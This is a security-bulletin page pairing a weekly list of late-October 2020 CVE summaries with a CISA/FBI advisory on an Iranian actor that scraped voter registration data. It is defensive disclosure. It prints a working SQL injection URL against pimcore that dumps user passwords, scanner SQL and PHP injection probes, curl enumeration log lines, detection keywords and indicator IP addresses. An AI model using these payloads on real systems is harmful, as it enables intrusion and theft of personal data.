libtac in pam_tacplus through 1.5.1 lacks a check for a failure of RAND_bytes()/RAND_pseudo_bytes(). This could lead to use of a non-random/predictable session_id. 2020-10-26 not yet calculated CVE-2020-27743
MISC
MISC
pathval — pathval This affects all versions of package pathval. 2020-10-26 not yet calculated CVE-2020-7751
MISC
MISC
pimcore — pimcore
 
The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{“keyId”%3a”””,”groupId”%3a”‘asd’))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,”,11,12,”,14+from+users)+–+”}] 2020-10-30 not yet calculated CVE-2020-7759
CONFIRM
CONFIRM
pulse_secure — desktop_client
 
A vulnerability in the Pulse Secure Desktop Client < 9.1R9 could allow the attacker to perform a MITM Attack if end users are convinced to connect to a malicious server. 2020-10-28 not yet calculated CVE-2020-8241
MISC
pulse_secure — desktop_client
 
A vulnerability in the Pulse Secure Desktop Client < 9.1R9 allows a restricted user on an endpoint machine can use system-level privileges if the Embedded Browser is configured with Credential Provider. This vulnerability only affects Windows PDC if the Embedded Browser is configured with the Credential Provider. 2020-10-28 not yet calculated CVE-2020-8240
MISC
pulse_secure — desktop_client
 
A vulnerability in the Pulse Secure Desktop Client < 9.1R9 is vulnerable to the client registry privilege escalation attack. This fix also requires Server Side Upgrade due to Standalone Host Checker Client (Windows) and Windows PDC. 2020-10-28 not yet calculated CVE-2020-8239
MISC
pulse_secure — desktop_client
 
A vulnerability in the Pulse Secure Desktop Client (Linux) < 9.1R9 could allow local attackers to perform buffer overflow. 2020-10-28 not yet calculated CVE-2020-8249
MISC
pulse_secure — desktop_client
 
A vulnerability in the Pulse Secure Desktop Client < 9.1R9 has Remote Code Execution (RCE) if users can be convinced to connect to a malicious server. This vulnerability only affects Windows PDC.To improve the security of connections between Pulse clients and Pulse Connect Secure, see below recommendation(s):Disable Dynamic certificate trust for PDC. 2020-10-28 not yet calculated CVE-2020-8254
MISC
pulse_secure — pulse_connect_secure_and_pulse_policy_secure
 
An XML external entity (XXE) vulnerability in Pulse Connect Secure (PCS) before 9.1R9 and Pulse Policy Secure (PPS) before 9.1R9 allows remote authenticated admins to conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request. 2020-10-27 not yet calculated CVE-2020-15352
MISC
pulse_secure — pulse_connect_secure_and_pulse_policy_secure
 
A vulnerability in the Pulse Connect Secure / Pulse Policy Secure < 9.1R9 is vulnerable to arbitrary cookie injection. 2020-10-28 not yet calculated CVE-2020-8261
MISC
pulse_secure — pulse_connect_secure_and_pulse_policy_secure
 
A vulnerability in the Pulse Connect Secure / Pulse Policy Secure below 9.1R9 could allow attackers to conduct Cross-Site Scripting (XSS) and Open Redirection for authenticated user web interface. 2020-10-28 not yet calculated CVE-2020-8262
MISC
qnap — qts If exploited, this cross-site scripting vulnerability could allow remote attackers to inject malicious code. QNAP has already fixed the issue in the following QTS versions. QTS 4.4.2.1231 on build 20200302; QTS 4.4.1.1201 on build 20200130; QTS 4.3.6.1218 on build 20200214; QTS 4.3.4.1190 on build 20200107; QTS 4.3.3.1161 on build 20200109; QTS 4.2.6 on build 20200109. 2020-10-28 not yet calculated CVE-2018-19953
CONFIRM
qnap — qts
 
If exploited, this cross-site scripting vulnerability could allow remote attackers to inject malicious code. QNAP has already fixed these issues in the following QTS versions. QTS 4.4.2.1270 build 20200410 and later QTS 4.4.1.1261 build 20200330 and later QTS 4.3.6.1263 build 20200330 and later QTS 4.3.4.1282 build 20200408 and later QTS 4.3.3.1252 build 20200409 and later QTS 4.2.6 build 20200421 and later 2020-10-28 not yet calculated CVE-2018-19943
CONFIRM
qnap — qts
 
If exploited, this command injection vulnerability could allow remote attackers to run arbitrary commands. QNAP has already fixed the issue in the following QTS versions. QTS 4.4.2.1231 on build 20200302; QTS 4.4.1.1201 on build 20200130; QTS 4.3.6.1218 on build 20200214; QTS 4.3.4.1190 on build 20200107; QTS 4.3.3.1161 on build 20200109; QTS 4.2.6 on build 20200109. 2020-10-28 not yet calculated CVE-2018-19949
CONFIRM
qsc — q-sys_core_manager
 
An issue was discovered in QSC Q-SYS Core Manager 8.2.1. By utilizing the TFTP service running on UDP port 69, a remote attacker can perform a directory traversal and obtain operating system files via a TFTP GET request, as demonstrated by reading /etc/passwd or /proc/version. 2020-10-28 not yet calculated CVE-2020-24990
MISC
MISC
MISC
rapid7 — metasploit
 
Rapid7’s Metasploit msfvenom framework handles APK files in a way that allows for a malicious user to craft and publish a file that would execute arbitrary commands on a victim’s machine. 2020-10-29 not yet calculated CVE-2020-7384
MISC
red_discord_bot — mod_module
 
Red Discord Bot before version 3.4.1 has an unauthorized privilege escalation exploit in the Mod module. This exploit allows Discord users with a high privilege level within the guild to bypass hierarchy checks when the application is in a specific condition that is beyond that user’s control. By abusing this exploit, it is possible to perform destructive actions within the guild the user has high privileges in. This exploit has been fixed in version 3.4.1. As a workaround, unloading the Mod module with unload mod or, disabling the massban command with command disable global massban can render this exploit not accessible. We still highly recommend updating to 3.4.1 to completely patch this issue. 2020-10-28 not yet calculated CVE-2020-15278
MISC
MISC
CONFIRM
red_hat — ansible
 
A flaw was found in Ansible Collection community.crypto. openssl_privatekey_info exposes private key in logs. This directly impacts confidentiality 2020-10-29 not yet calculated CVE-2020-25646
MISC
sal — sal
 
Sal is a multi-tenanted reporting dashboard for Munki with the ability to display information from Facter. In Sal through version 4.1.6 there is an XSS vulnerability on the machine_list view. 2020-10-29 not yet calculated CVE-2020-26205
MISC
CONFIRM
samba — winbind
 
A null pointer dereference flaw was found in samba’s Winbind service in versions before 4.11.15, before 4.12.9 and before 4.13.1. A local user could use this flaw to crash the winbind service causing denial of service. 2020-10-29 not yet calculated CVE-2020-14323
MISC
MISC
sec_consult — publixone
 
konzept-ix publiXone before 2020.015 allows attackers to take over arbitrary user accounts by crafting password-reset tokens. 2020-10-27 not yet calculated CVE-2020-27179
MISC
MISC
sectona — spectra
 
Sectona Spectra before 3.4.0 has a vulnerable SOAP API endpoint that leaks sensitive information about the configured assets without proper authentication. This could be used by unauthorized parties to get configured login credentials of the assets via a modified pAccountID value. 2020-10-28 not yet calculated CVE-2020-25966
MISC
MISC
shibboleth — identity_provider
 
Shibboleth Identify Provider 3.x before 3.4.6 has a denial of service flaw. A remote unauthenticated attacker can cause a login flow to trigger Java heap exhaustion due to the creation of objects in the Java Servlet container session. 2020-10-28 not yet calculated CVE-2020-27978
MISC
smartstorenet — smartstorenet
 
An issue was discovered in SmartStoreNET before 4.0.1. It does not properly consider the need for a CustomModelPartAttribute decoration in certain ModelBase.CustomProperties situations. 2020-10-29 not yet calculated CVE-2020-27996
MISC
MISC
sonicwall — global_vpn
 
SonicWall Global VPN client version 4.10.4.0314 and earlier allows unprivileged windows user to elevate privileges to SYSTEM through loaded process hijacking vulnerability. 2020-10-28 not yet calculated CVE-2020-5144
CONFIRM
sourcecodester — car_rental_management_system
 
An Arbitrary File Upload in the Upload Image component in SourceCodester Car Rental Management System 1.0 allows the user to conduct remote code execution via admin/index.php?page=manage_car because .php files can be uploaded to admin/assets/uploads/ (under the web root). 2020-10-28 not yet calculated CVE-2020-27956
MISC
MISC
sourceforge — dual_dhcp_dns_server
 
An issue was discovered in Dual DHCP DNS Server 7.40. Due to insufficient access restrictions in the default installation directory, an attacker can elevate privileges by replacing the DualServer.exe binary. 2020-10-28 not yet calculated CVE-2020-26133
MISC
MISC
sourceforge — home_dns_server
 
An issue was discovered in Home DNS Server 0.10. Due to insufficient access restrictions in the default installation directory, an attacker can elevate privileges by replacing the HomeDNSServer.exe binary. 2020-10-28 not yet calculated CVE-2020-26132
MISC
MISC
sourceforge — open_dhcp_server
 
Issues were discovered in Open DHCP Server (Regular) 1.75 and Open DHCP Server (LDAP Based) 0.1Beta. Due to insufficient access restrictions in the default installation directory, an attacker can elevate privileges by replacing the OpenDHCPServer.exe (Regular) or the OpenDHCPLdap.exe (LDAP Based) binary. 2020-10-28 not yet calculated CVE-2020-26131
MISC
MISC
sourceforge — open_tftp_server
 
Issues were discovered in Open TFTP Server multithreaded 1.66 and Open TFTP Server single port 1.66. Due to insufficient access restrictions in the default installation directory, an attacker can elevate privileges by replacing the OpenTFTPServerMT.exe or the OpenTFTPServerSP.exe binary. 2020-10-28 not yet calculated CVE-2020-26130
MISC
MISC
sourceforge — snap7
 
The Snap7 server component in version 1.4.1, when an attacker sends a crafted packet with COTP protocol the last-data-unit flag set to No and S7 writes a var function, the Snap7 server will be crashed. 2020-10-28 not yet calculated CVE-2020-22552
MISC
MISC
MISC
synology — diskstation_manager

 

Cleartext transmission of sensitive information vulnerability in DDNS in Synology DiskStation Manager (DSM) before 6.2.3-25426-2 allows man-in-the-middle attackers to eavesdrop authentication information of DNSExit via unspecified vectors. 2020-10-29 not yet calculated CVE-2020-27656
CONFIRM
synology — diskstation_manager
 
Synology DiskStation Manager (DSM) before 6.2.3-25426-2 does not set the Secure flag for the session cookie in an HTTPS session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an HTTP session. 2020-10-29 not yet calculated CVE-2020-27650
CONFIRM
synology — diskstation_manager
 
Algorithm downgrade vulnerability in QuickConnect in Synology DiskStation Manager (DSM) before 6.2.3-25426-2 allows man-in-the-middle attackers to spoof servers and obtain sensitive information via unspecified vectors. 2020-10-29 not yet calculated CVE-2020-27652
CONFIRM
MISC
synology — diskstation_manager
 
Improper certificate validation vulnerability in OpenVPN client in Synology DiskStation Manager (DSM) before 6.2.3-25426-2 allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. 2020-10-29 not yet calculated CVE-2020-27648
CONFIRM
MISC
synology — router_manager Synology Router Manager (SRM) before 1.2.4-8081 does not include the HTTPOnly flag in a Set-Cookie header for the session cookie, which makes it easier for remote attackers to obtain potentially sensitive information via script access to this cookie. 2020-10-29 not yet calculated CVE-2020-27658
CONFIRM
MISC
synology — router_manager Cleartext transmission of sensitive information vulnerability in DDNS in Synology Router Manager (SRM) before 1.2.4-8081 allows man-in-the-middle attackers to eavesdrop authentication information of DNSExit via unspecified vectors. 2020-10-29 not yet calculated CVE-2020-27657
CONFIRM
synology — router_manager
 
Improper certificate validation vulnerability in OpenVPN client in Synology Router Manager (SRM) before 1.2.4-8081 allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. 2020-10-29 not yet calculated CVE-2020-27649
CONFIRM
MISC
synology — router_manager
 
Improper access control vulnerability in lbd in Synology Router Manager (SRM) before 1.2.4-8081 allows remote attackers to execute arbitrary commands via port (1) 7786/tcp or (2) 7787/tcp. 2020-10-29 not yet calculated CVE-2020-27654
CONFIRM
MISC
MISC
synology — router_manager
 
Synology Router Manager (SRM) before 1.2.4-8081 does not set the Secure flag for the session cookie in an HTTPS session, which makes it easier for remote attackers to capture this cookie by intercepting its transmission within an HTTP session. 2020-10-29 not yet calculated CVE-2020-27651
CONFIRM
MISC
synology — router_manager
 
Algorithm downgrade vulnerability in QuickConnect in Synology Router Manager (SRM) before 1.2.4-8081 allows man-in-the-middle attackers to spoof servers and obtain sensitive information via unspecified vectors. 2020-10-29 not yet calculated CVE-2020-27653
CONFIRM
MISC
synology — router_manager
 
Improper access control vulnerability in Synology Router Manager (SRM) before 1.2.4-8081 allows remote attackers to access restricted resources via inbound QuickConnect traffic. 2020-10-29 not yet calculated CVE-2020-27655
CONFIRM
texas_instruments — cc2538_devices

 

The Zigbee protocol implementation on Texas Instruments CC2538 devices with Z-Stack 3.0.1 does not properly process a ZCL Read Reporting Configuration Response message. It crashes in zclHandleExternal(). 2020-10-27 not yet calculated CVE-2020-27891
MISC
MISC
texas_instruments — cc2538_devices

 

The Zigbee protocol implementation on Texas Instruments CC2538 devices with Z-Stack 3.0.1 does not properly process a ZCL Discover Commands Received Response message or a ZCL Discover Commands Generated Response message. It crashes in zclParseInDiscCmdsRspCmd(). 2020-10-27 not yet calculated CVE-2020-27892
MISC
MISC
texas_instruments — cc2538_devices
 
The Zigbee protocol implementation on Texas Instruments CC2538 devices with Z-Stack 3.0.1 does not properly process a ZCL Write Attributes No Response message. It crashes in zclParseInWriteCmd() and does not update the specific attribute’s value. 2020-10-27 not yet calculated CVE-2020-27890
MISC
MISC
trend_micro — antivirus_for_mac
 
Trend Micro Antivirus for Mac 2020 (Consumer) contains an Error Message Information Disclosure vulnerability that if exploited, could allow kernel pointers and debug messages to leak to userland. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability. 2020-10-30 not yet calculated CVE-2020-27015
N/A
N/A
trend_micro — antivirus_for_mac
 
Trend Micro Antivirus for Mac 2020 (Consumer) contains a race condition vulnerability in the Web Threat Protection Blocklist component, that if exploited, could allow an attacker to case a kernel panic or crash. An attacker must first obtain the ability to execute high-privileged code on the target system in order to exploit this vulnerability. 2020-10-30 not yet calculated CVE-2020-27014
N/A
N/A

ubiquiti — unifi_meshing_access_point_unifi_controller_devices

An issue was discovered on Ubiquiti UniFi Meshing Access Point UAP-AC-M 4.3.21.11325 and UniFi Controller 6.0.28 devices. Cached credentials are not erased from an access point returning wirelessly from a disconnected state. This may provide unintended network access. 2020-10-27 not yet calculated CVE-2020-27888
MISC
vbulletin — vbulletin
 
vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. ALSO NOTE: CVE-2020-7373 is a duplicate of CVE-2020-17496. CVE-2020-17496 is the preferred CVE ID to track this vulnerability. 2020-10-30 not yet calculated CVE-2020-7373
MISC
MISC
MISC
MISC
vmware — tanzu
 
Single Sign-On for Vmware Tanzu all versions prior to 1.11.3 ,1.12.x versions prior to 1.12.4 and 1.13.x prior to 1.13.1 are vulnerable to user impersonation attack.If two users are logged in to the SSO operator dashboard at the same time, with the same username, from two different identity providers, one can acquire the token of the other and thus operate with their permissions. Note: Foundation may be vulnerable only if: 1) The system zone is set up to use a SAML identity provider 2) There are internal users that have the same username as users in the external SAML provider 3) Those duplicate-named users have the scope to access the SSO operator dashboard 4) The vulnerability doesn’t appear with LDAP because of chained authentication. 2020-10-31 not yet calculated CVE-2020-5425
CONFIRM
western_digital — my_cloud_devices
 
Addressed multiple stack buffer overflow vulnerabilities that could allow an attacker to carry out escalation of privileges through unauthorized remote code execution in Western Digital My Cloud devices before 5.04.114. 2020-10-27 not yet calculated CVE-2020-12830
MISC
CONFIRM
western_digital — my_cloud_devices
 
Addressed remote code execution vulnerability in reg_device.php due to insufficient validation of user input.in Western Digital My Cloud Devices prior to 5.4.1140. 2020-10-27 not yet calculated CVE-2020-25765
MISC
CONFIRM
western_digital — my_cloud_nas_devices
 
Addressed remote code execution vulnerability in DsdkProxy.php due to insufficient sanitization and insufficient validation of user input in Western Digital My Cloud NAS devices prior to 5.04.114 2020-10-27 not yet calculated CVE-2020-27159
MISC
CONFIRM
western_digital — my_cloud_nas_devices
 
Addressed remote code execution vulnerability in AvailableApps.php that allowed escalation of privileges in Western Digital My Cloud NAS devices prior to 5.04.114 (issue 3 of 3). 2020-10-27 not yet calculated CVE-2020-27160
MISC
CONFIRM
western_digital — my_cloud_nas_devices
 
Addressed remote code execution vulnerability in cgi_api.php that allowed escalation of privileges in Western Digital My Cloud NAS devices prior to 5.04.114. 2020-10-27 not yet calculated CVE-2020-27158
MISC
CONFIRM
western_digital — my_cloud_nas_devices
 
An issue was discovered on Western Digital My Cloud NAS devices before 5.04.114. They allow remote code execution with resultant escalation of privileges. 2020-10-29 not yet calculated CVE-2020-27744
MISC
winston_privacy — winston_privacy Winston 1.5.4 devices do not enforce authorization. This is exploitable from the intranet, and can be combined with other vulnerabilities for remote exploitation. 2020-10-28 not yet calculated CVE-2020-16260
MISC
MISC
winston_privacy — winston_privacy Winston 1.5.4 devices allow a U-Boot interrupt, resulting in local root access. 2020-10-28 not yet calculated CVE-2020-16261
MISC
MISC
winston_privacy — winston_privacy Winston 1.5.4 devices have a local www-data user that is overly permissioned, resulting in root privilege escalation. 2020-10-28 not yet calculated CVE-2020-16262
MISC
MISC
winston_privacy — winston_privacy
 
Winston 1.5.4 devices have an SSH user account with access from bastion hosts. This is undocumented in device documents and is not announced to the user. 2020-10-28 not yet calculated CVE-2020-16259
MISC
MISC
winston_privacy — winston_privacy
 
Winston 1.5.4 devices make use of a Monit service (not managed during the normal user process) which is configured with default credentials. 2020-10-28 not yet calculated CVE-2020-16258
MISC
MISC
winston_privacy — winston_privacy
 
Winston 1.5.4 devices are vulnerable to command injection via the API. 2020-10-28 not yet calculated CVE-2020-16257
MISC
MISC
winston_privacy — winston_privacy
 
The API on Winston 1.5.4 devices is vulnerable to CSRF. 2020-10-28 not yet calculated CVE-2020-16256
MISC
MISC
winston_privacy — winston_privacy
 
Winston 1.5.4 devices have a CORS configuration that trusts arbitrary origins. This allows requests to be made and viewed by arbitrary origins. 2020-10-28 not yet calculated CVE-2020-16263
MISC
MISC
wire — wire
 
Wire before 2020-10-16 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a format string. This affects Wire AVS (Audio, Video, and Signaling) 5.3 through 6.x before 6.4, the Wire Secure Messenger application before 3.49.918 for Android, and the Wire Secure Messenger application before 3.61 for iOS. This occurs via the value parameter to sdp_media_set_lattr in peerflow/sdp.c. 2020-10-27 not yet calculated CVE-2020-27853
MISC
wso2 — api_manager
 
Cross-Site Scripting (XSS) vulnerability on WSO2 API Manager 3.1.0. By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged-in user’s session by stealing cookies which means that a malicious hacker can change the logged-in user’s password and invalidate the session of the victim while the hacker maintains access. 2020-10-29 not yet calculated CVE-2020-27885
MISC
MISC
wso2 — enterprise_integrator
 
WSO2 Enterprise Integrator 6.6.0 or earlier contains a stored cross-site scripting (XSS) vulnerability in BPMN explorer tasks. 2020-10-29 not yet calculated CVE-2020-25516
MISC
MISC
zohocorp — manageengine_applications_manager SQL Injection in Zoho ManageEngine Applications Manager 14 before 14560 allows an attacker to execute commands on the server via the MyPage.do template_resid parameter. 2020-10-29 not yet calculated CVE-2020-27995
MISC

Back to top

This product is provided subject to this Notification and this Privacy & Use policy.

Categories
alerts

AA20-304A: Iranian Advanced Persistent Threat Actor Identified Obtaining Voter Registration Data

Original release date: October 30, 2020 | Last revised: November 3, 2020<br/><h3>Summary</h3><p class=”tip-intro” style=”font-size: 15px;”><em>This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK®) version 8 framework. See the <a href=”https://attack.mitre.org/versions/v8/techniques/enterprise/”>ATT&amp;CK for Enterprise version 8</a> for all referenced threat actor techniques.</em></p>

<p>This joint cybersecurity advisory was coauthored by the Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI). CISA and the FBI are aware of an Iranian advanced persistent threat (APT) actor targeting U.S. state websites—to include election websites. CISA and the FBI assess this actor is responsible for&nbsp;the mass dissemination of voter intimidation emails to U.S. citizens and the dissemination of U.S. election-related disinformation in mid-October 2020. <fn value=”1″>This disinformation (hereinafter, “the propaganda video”) was in the form of a video purporting to misattribute the activity to a U.S. domestic actor and implies that individuals could cast fraudulent ballots, even from overseas. https://www.odni.gov/index.php/newsroom/press-releases/item/2162-dni-john-ratcliffe-s-remarks-at-press-conference-on-election-security. </fn>&nbsp;(Reference FBI FLASH message <a href=”https://www.ic3.gov/Media/News/2020/201030.pdf”>ME-000138-TT</a>, disseminated October 29, 2020). Further evaluation by CISA and the FBI has identified the targeting of U.S. state election websites was an intentional effort to influence and interfere with the 2020 U.S. presidential election.</p>

<p>Click <a href=”https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-304A-Iranian_Advanced_Persistent_Threat_Actor_Identified_Obtaining_Voter_Registration_Data.pdf”>here</a> for a PDF version of this report.</p>
<h3>Technical Details</h3><p>Analysis by CISA and the FBI indicates this actor scanned state websites, to include state election websites, between September 20 and September 28, 2020, with the Acunetix vulnerability scanner (<em>Active Scanning: Vulnerability Scanning</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1595/002/”>T1595.002</a>]). Acunetix is a widely used and legitimate web scanner, which has been used by threat actors for nefarious purposes. Organizations that do not regularly use Acunetix should monitor their logs for any activity from the program that originates from IP addresses provided in this advisory and consider it malicious reconnaissance behavior.&nbsp;</p>

<p>Additionally, CISA and the FBI observed this actor attempting to exploit websites to obtain copies of voter registration data between September 29 and October 17, 2020 (<em>Exploit Public-Facing Application</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1190/”>T1190</a>]). This includes attempted exploitation of known vulnerabilities, directory traversal, Structured Query Language (SQL) injection, web shell uploads, and leveraging unique flaws in websites.&nbsp;</p>

<p>CISA and the FBI can confirm that the actor successfully obtained voter registration data in at least one state. The access of voter registration data appeared to involve the abuse of website misconfigurations and a scripted process using the cURL tool to iterate through voter records. A review of the records that were copied and obtained reveals the information was used in the propaganda video.&nbsp;</p>

<p>CISA and FBI analysis of identified activity against state websites, including state election websites, referenced in this product cannot all be fully attributed to this Iranian APT actor. FBI analysis of the Iranian APT actor’s activity has identified targeting of U.S. elections’ infrastructure (<em>Compromise Infrastructure</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1584/”>T1584</a>]) within a similar timeframe, use of IP addresses and IP ranges<span style=”font-size:11.0pt”><span style=”line-height:115%”><span style=”font-family:&quot;Arial&quot;,sans-serif”>—</span></span></span>including numerous virtual private network (VPN) service exit nodes—which correlate to this Iran APT actor (<em>Gather Victim Host Information</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1592/”>T1592</a>)]), and other investigative information.&nbsp;</p>

<h2>Reconnaissance</h2>

<p>The FBI has information indicating this Iran-based actor attempted to access PDF documents from state voter sites using advanced open-source queries (<em>Search Open Websites and Domains</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1593″>T1593</a>]). The actor demonstrated interest in PDFs hosted on URLs with the words “vote” or “voter” and “registration.” The FBI identified queries of URLs for election-related sites.&nbsp;</p>

<p>The FBI also has information indicating the actor researched &nbsp;the following information in a suspected attempt to further their efforts to survey and exploit state election websites.</p>

<ul>
<li>YOURLS exploit</li>
<li>Bypassing ModSecurity Web Application Firewall</li>
<li>Detecting Web Application Firewalls</li>
<li>SQLmap tool</li>
</ul>

<h3>Acunetix Scanning</h3>

<p>CISA’s analysis identified the scanning of multiple entities by the Acunetix Web Vulnerability scanning platform between September 20 and September 28, 2020 (<em>Active Scanning: Vulnerability Scanning</em> [<a href=”https://attack.mitre.org/versions/v8/techniques/T1595/002/”>T1595.002</a>]).&nbsp;</p>

<p>The actor used the scanner to attempt SQL injection into various fields in <code>/registration/registration/details</code> with status codes 404 or 500.</p>

<p><code>/registration/registration/details?addresscity=-1 or 3*2&lt;(0+5+513-513) — &amp;addressstreet1=xxxxx&amp;btnbeginregistration=begin voter registration&amp;btnnextelectionworkerinfo=next&amp;btnnextpersonalinfo=next&amp;btnnextresdetails=next&amp;btnnextvoterinformation=next&amp;btnsubmit=submit&amp;chkageverno=on&amp;chkageveryes=on&amp;chkcitizenno=on&amp;chkcitizenyes=on&amp;chkdisabledvoter=on&amp;chkelectionworker=on&amp;chkresprivate=1&amp;chkstatecancel=on&amp;dlnumber=1&amp;dob=xxxx/x/x&amp;email=sample@email.tst&amp;firstname=xxxxx&amp;gender=radio&amp;hdnaddresscity=&amp;hdngender=&amp;last4ssn=xxxxx&amp;lastname=xxxxxinjjeuee&amp;mailaddresscountry=sample@xxx.xxx&amp;mailaddressline1=sample@email.tst&amp;mailaddressline2=sample@xxx.xxx&amp;mailaddressline3=sample@xxx.xxx&amp;mailaddressstate=aa&amp;mailaddresszip=sample@xxxx.xxx&amp;mailaddresszipex=sample@xxx.xxx&amp;middlename=xxxxx&amp;overseas=1&amp;partycode=a&amp;phoneno1=xxx-xxx-xxxx&amp;phoneno2=xxx-xxx-xxxx&amp;radio=consent&amp;statecancelcity=xxxxxxx&amp;statecancelcountry=usa&amp;statecancelstate=XXaa&amp;statecancelzip=xxxxx&amp;statecancelzipext=xxxxx&amp;suffixname=esq&amp;txtmailaddresscity=sample@xxx.xxx</code></p>

<h3>Requests</h3>

<p>The actor used the following requests associated with this scanning activity.</p>

<p><code>2020-09-26 13:12:56 x.x.x.x GET /x/x v[$acunetix]=1 443 – x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 – 200 0 0 0</code></p>

<p><code>2020-09-26 13:13:19 X.X.x.x GET /x/x voterid[$acunetix]=1 443 – x.x.x.x Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 – 200 0 0 1375</code></p>

<p><code>2020-09-26 13:13:18 .X.x.x GET /x/x voterid=;print(md5(acunetix_wvs_security_test)); 443 – X.X.x.x&nbsp;</code></p>

<h3>User Agents Observed</h3>

<p>CISA and FBI have observed the following user agents associated with this scanning activity.</p>

<p><code>Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 – 500 0 0 0&nbsp;</code></p>

<p><code>Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4&nbsp;</code></p>

<p><code>Mozilla/5.0+(X11;+U;+Linux+i686;+en-US;+rv:1.8.1.17)+Gecko/20080922+Ubuntu/7.10+(gutsy)+Firefox/2.0.0.17</code></p>

<h2>Exfiltration</h2>

<h3>Obtaining Voter Registration Data</h3>

<p>Following the review of web server access logs, CISA analysts, in coordination with the FBI, found instances of the cURL and FDM User Agents sending GET requests to a web resource associated with voter registration data. The activity occurred between September 29 and October 17, 2020. Suspected scripted activity submitted several hundred thousand queries iterating through voter identification values, and retrieving results with varying levels of success [<em>Gather Victim Identity Information</em> (<a href=”https://attack.mitre.org/versions/v8/techniques/T1593/”>T1589</a>)]. A sample of the records identified by the FBI reveals they match information in the aforementioned propaganda video.<br />
Requests</p>

<p>The actor used the following requests.</p>

<p><code>2020-10-17 13:07:51 x.x.x.x GET /x/x voterid=XXXX1 443 – x.x.x.x curl/7.55.1 – 200 0 0 1406</code></p>

<p><code>2020-10-17 13:07:55 x.x.x.x GET /x/x voterid=XXXX2 443 – x.x.x.x curl/7.55.1 – 200 0 0 1390</code></p>

<p><code>2020-10-17 13:07:58 x.x.x.x GET /x/x voterid=XXXX3 443 – x.x.x.x curl/7.55.1 – 200 0 0 1625</code></p>

<p><code>2020-10-17 13:08:00 x.x.x.x GET /x/x voterid=XXXX4 443 – x.x.x.x curl/7.55.1 – 200 0 0 1390</code></p>

<p>Note: incrementing <code>voterid </code>values in <code>cs_uri_query field</code></p>

<h3>User Agents</h3>

<p>CISA and FBI have observed the following user agents.</p>

<p><code>FDM+3.x</code></p>

<p><code>curl/7.55.1</code></p>

<p><code>Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.21+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.21 – 500 0 0 0&nbsp;<br />
Mozilla/5.0+(X11;+U;+Linux+x86_64;+en-US;+rv:1.9b4)+Gecko/2008031318+Firefox/3.0b4</code></p>

<p>See figure 1 below for a timeline of the actor’s malicious activity.</p>

<p><img alt=”” data-entity-type=”file” data-entity-uuid=”b752a4ee-19a8-4f25-824d-d036cf917f5c” height=”240″ src=”https://us-cert.cisa.gov/sites/default/files/2020-10/Technical%20Findings.png” width=”817″ /></p>

<p class=”text-align-center”><em>Figure 1: Overview of malicious activity</em></p>
<h3>Mitigations</h3><h2>Detection</h2>

<h3>Acunetix Scanning</h3>

<p>Organizations can identify Acunetix scanning activity by using the following keywords while performing log analysis.</p>

<ul>
<li><code>$acunetix</code></li>
<li><code>acunetix_wvs_security_test</code></li>
</ul>

<h3>Indicators of Compromise</h3>

<p>For a downloadable copy of IOCs, see <a href=”https://us-cert.cisa.gov/sites/default/files/2020-10/AA20-304A.stix.xml”>AA20-304A.stix</a>.</p>

<p><strong>Disclaimer:</strong> <em>many of the IP addresses included below likely correspond to publicly available VPN services, which can be used by individuals all over the world. This creates the potential for a significant number of false positives; only activity listed in this advisory warrants further investigation. The actor likely uses various IP addresses and VPN services.</em></p>

<p>The following IPs have been associated with this activity.</p>

<ul>
<li>102.129.239[.]185 (Acunetix Scanning)</li>
<li>143.244.38[.]60 (Acunetix Scanning and cURL requests)</li>
<li>45.139.49[.]228 (Acunetix Scanning)</li>
<li>156.146.54[.]90 (Acunetix Scanning)</li>
<li>109.202.111[.]236 (cURL requests)</li>
<li>185.77.248[.]17 (cURL requests)</li>
<li>217.138.211[.]249 (cURL requests)</li>
<li>217.146.82[.]207 (cURL requests)</li>
<li>37.235.103[.]85 (cURL requests)</li>
<li>37.235.98[.]64 (cURL requests)</li>
<li>70.32.5[.]96 (cURL requests)</li>
<li>70.32.6[.]20 (cURL requests)</li>
<li>70.32.6[.]8 (cURL requests)</li>
<li>70.32.6[.]97 (cURL requests)</li>
<li>70.32.6[.]98 (cURL requests)</li>
<li>77.243.191[.]21 (cURL requests and FDM+3.x [Free Download Manager v3] enumeration/iteration)</li>
<li>92.223.89[.]73 (cURL requests)</li>
</ul>

<p>CISA and the FBI are aware the following IOCs have been used by this Iran-based actor. These IP addresses facilitated the mass dissemination of voter intimidation email messages on October 20, 2020.</p>

<ul>
<li>195.181.170[.]244 (Observed September 30 and October 20, 2020)</li>
<li>102.129.239[.]185 (Observed September 30, 2020)</li>
